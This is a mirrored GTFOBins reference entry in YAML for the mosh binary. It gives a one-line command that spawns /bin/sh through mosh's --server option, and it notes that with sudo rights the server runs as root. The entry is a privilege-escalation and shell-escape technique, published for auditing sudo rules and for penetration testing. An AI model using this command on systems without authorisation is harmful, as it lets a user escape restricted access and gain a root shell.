mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
13 lines
245 B
Plaintext
13 lines
245 B
Plaintext
---
|
|
functions:
|
|
shell:
|
|
- code: |-
|
|
mosh --server=mosh-server localhost /bin/sh
|
|
comment: |-
|
|
This requires a valid SSH access.
|
|
contexts:
|
|
sudo:
|
|
comment: |-
|
|
The `mosh-server` is executed via `sudo`.
|
|
...
|